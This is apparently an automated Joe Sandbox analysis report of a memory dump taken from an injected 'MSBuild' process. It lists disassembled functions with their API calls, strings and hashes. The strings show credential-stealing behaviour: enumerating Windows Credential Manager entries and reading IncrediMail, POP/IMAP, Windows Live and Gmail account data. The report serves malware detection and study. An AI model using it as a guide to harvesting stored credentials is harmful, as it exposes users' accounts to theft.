\systemroot, xrefs: 004100FF

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
String ID: \systemroot
API String ID: 912701516-1821301763
Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A

Function 00402FDB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF

memset.MSVCRT ref: 0040301E

Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85

memset.MSVCRT ref: 0040306B
sprintf.MSVCRT ref: 00403083
memset.MSVCRT ref: 004030B4
RegCloseKey.ADVAPI32(?), ref: 004030FC
RegCloseKey.ADVAPI32(?), ref: 00403125

Strings

Identity, xrefs: 00403044
Software\IncrediMail\Identities, xrefs: 00402FEC
%s\Accounts, xrefs: 0040307D

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$Close$EnumOpensprintf
String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
API String ID: 3672803090-3168940695
Opcode ID: 5c4931b58724ce6f23218344ebc324bc2f6d6ee62796aebcafe77a086eee9130
Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
Opcode Fuzzy Hash: 5c4931b58724ce6f23218344ebc324bc2f6d6ee62796aebcafe77a086eee9130
Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4

Function 00408F1B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 00408F31
memset.MSVCRT ref: 00408F55
GetMenuItemInfoA.USER32(?), ref: 00408F8B
memset.MSVCRT ref: 00408FB8
strchr.MSVCRT ref: 00408FC4
_mbscat.MSVCRT ref: 0040901F
ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B

Strings

6, xrefs: 00408F7B
0, xrefs: 00408F70

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
String ID: 0$6
API String ID: 3540791495-3849865405
Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A

Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
CoTaskMemFree.COMBASE(00000000), ref: 00410970

Strings

220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FromStringUuid$FreeTaskmemcpy
String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
API String ID: 1640410171-2022683286
Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5

Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON

Download Yara Rule

APIs

Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1

memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA

Strings

nolock, xrefs: 00419952
immutable, xrefs: 0041996B
-journal, xrefs: 0041987F
-wal, xrefs: 004198B4

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$strlen
String ID: -journal$-wal$immutable$nolock
API String ID: 2619041689-3408036318
Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98

Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004019F6
abs.MSVCRT ref: 00401AF6
abs.MSVCRT ref: 00401B2D
log.MSVCRT ref: 00401BDC
log.MSVCRT ref: 00401BEE
free.MSVCRT ref: 00401C0F
free.MSVCRT ref: 00401C23

Strings

, xrefs: 00401A24

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: free$strlen
String ID:
API String ID: 667451143-3916222277
Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A

Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631

wcslen.MSVCRT ref: 0040874A
wcsncmp.MSVCRT ref: 00408794
memset.MSVCRT ref: 0040882A
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
wcschr.MSVCRT ref: 0040889F
LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB

Strings

J, xrefs: 004087CE
Microsoft_WinInet, xrefs: 0040873E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
String ID: J$Microsoft_WinInet
API String ID: 3318079752-260894208
Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A

Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
FreeLibrary.KERNEL32(00000000), ref: 00404ADE
MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09

Strings

InitCommonControlsEx, xrefs: 00404AC4
Error: Cannot load the common control classes., xrefs: 00404B03
Error, xrefs: 00404AFE
comctl32.dll, xrefs: 00404AA1

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
strlen.MSVCRT ref: 00406CCC
_mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
_mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6

Strings

Unknown Error, xrefs: 00406CEE
netmsg.dll, xrefs: 00406C9C

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
String ID: Unknown Error$netmsg.dll
API String ID: 2881943006-572158859
Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C

Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85

_mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
_mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7

Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293

Strings

TranslatorName, xrefs: 004096CB
general, xrefs: 0040968B
charset, xrefs: 004096B5
rtl, xrefs: 004096A1
TranslatorURL, xrefs: 004096DF

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfile_mbscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 888011440-2039793938
Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F

Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(00000000,?,00000020), ref: 0042E9C0
memset.MSVCRT ref: 0042E9FF

Strings

database is already attached, xrefs: 0042EA97
unable to open database: %s, xrefs: 0042EBD6
out of memory, xrefs: 0042EBEF
attached databases must use the same text encoding as main database, xrefs: 0042EAE6
cannot ATTACH database within transaction, xrefs: 0042E966
database %s is already in use, xrefs: 0042E9CE
too many attached databases - max %d, xrefs: 0042E951

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset
String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 1297977491-2001300268
Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A

Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D

??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409C53
??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00409C6F
memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409D3D
??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00409D47
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409D7F

Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE

Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F

Strings

0wE, xrefs: 00409C80, 00409C8D
d, xrefs: 00409D5E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
String ID: 0wE$d
API String ID: 2915808112-1552800882
Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44

Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C

strchr.MSVCRT ref: 0040327B

Strings

ReturnAddress, xrefs: 00403213
PopServer, xrefs: 004031C8
LoginName, xrefs: 004031E4
SavePasswordText, xrefs: 0040322B
UsesIMAP, xrefs: 00403188
RealName, xrefs: 004031FA
PopAccount, xrefs: 00403266
1, xrefs: 004031A9

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileStringstrchr
String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
API String ID: 1348940319-1729847305
Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54

Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,",00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
memcpy.MSVCRT(?,&,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072

Strings

<br>, xrefs: 0041106C
°, xrefs: 00411047
", xrefs: 0041102E
&, xrefs: 00411054
>, xrefs: 00411021
<, xrefs: 00411015

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F

Function 00405E69 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00405E80
GetWindow.USER32(?,00000005), ref: 00405E98
GetWindow.USER32(00000000), ref: 00405E9B

Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA

GetWindow.USER32(00000000,00000002), ref: 00405EA7
GetDlgItem.USER32(?,000003ED), ref: 00405EBE
GetDlgItem.USER32(?,00000000), ref: 00405ED0
GetDlgItem.USER32(?,00000000), ref: 00405EE2
GetDlgItem.USER32(?,000003ED), ref: 00405EF0
SetFocus.USER32(00000000), ref: 00405EF3

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Window$Item$Rect$ClientFocusPoints
String ID:
API String ID: 2432066023-0
Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28

Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8

memset.MSVCRT ref: 0040FA1E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
_strnicmp.MSVCRT ref: 0040FA4F
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B

Strings

windowslive:name=, xrefs: 0040FA49
WindowsLive:name=*, xrefs: 0040F993, 0040F9CA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide$Version_strnicmpmemset
String ID: WindowsLive:name=*$windowslive:name=
API String ID: 945165440-3589380929
Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66

Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2

strchr.MSVCRT ref: 0040371F
_mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
_mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
strlen.MSVCRT ref: 00403778
sprintf.MSVCRT ref: 0040379C
_mbscpy.MSVCRT(?,?), ref: 004037B2

Strings

%s@gmail.com, xrefs: 00403796

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
String ID: %s@gmail.com
API String ID: 3261640601-4097000612
Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65

Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004094C8
GetDlgCtrlID.USER32(?), ref: 004094D3
GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
memset.MSVCRT ref: 0040950C
GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
_strcmpi.MSVCRT ref: 00409531

Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B

Strings

sysdatetimepick32, xrefs: 0040952B

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
String ID: sysdatetimepick32
API String ID: 3411445237-4169760276
Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64

Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00405A31
GetDlgItem.USER32(?,000003E9), ref: 00405A47
GetDlgItem.USER32(?,000003E9), ref: 00405A5F
GetDlgItem.USER32(?,000003E9), ref: 00405A7A
EndDialog.USER32(?,00000002), ref: 00405A96
EndDialog.USER32(?,00000001), ref: 00405AA9

Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776

SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Item$DialogMessageSend
String ID:
API String ID: 2485852401-0
Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58

Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
